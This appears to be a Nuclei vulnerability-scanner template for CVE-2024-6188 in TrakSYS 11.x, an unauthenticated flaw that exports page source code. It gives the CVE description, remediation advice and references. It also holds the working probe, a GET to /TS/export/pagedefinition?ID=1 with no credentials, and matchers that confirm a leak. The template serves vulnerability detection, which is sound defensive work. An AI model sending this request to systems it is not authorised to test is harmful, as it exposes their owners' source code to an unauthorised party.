id: CVE-2024-6188 info: name: TrakSYS 11.x.x - Sensitive Data Exposure author: s4e-io severity: medium description: | A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. remediation: | Apply the latest security patches and updates from the vendor to address this vulnerability. impact: An attacker is able to export the source code of the pages without having any credentials to access the application. reference: - https://kiwiyumi.com/post/tracksys-export-source-code/ - https://nvd.nist.gov/vuln/detail/CVE-2024-6188 - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6188 - https://debricked.com/vulnerability-database/vulnerability/CVE-2024-6188 classification: epss-score: 0.02053 epss-percentile: 0.79268 metadata: verified: true max-request: 1 vendor: parsec-automation product: tracksys tags: cve,cve2024,traksys,idor,info-leak,vkev,vuln http: - raw: - | GET /TS/export/pagedefinition?ID=1 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "TrakSYS Version" - "Name" - "Altname" condition: and - type: word part: content_type words: - "text/plain" - type: status status: - 200 # digest: 4a0a004730450220704fad8503f4a5ccad07036dde0a531fc22b2843cbb234ecaef1a440ea17a95b022100b1b4170966e8b9160b59e9a0570876dd6058e7f83b95a09d68bfb29c4ea19805:922c64590222798bb761d5b6d8e72950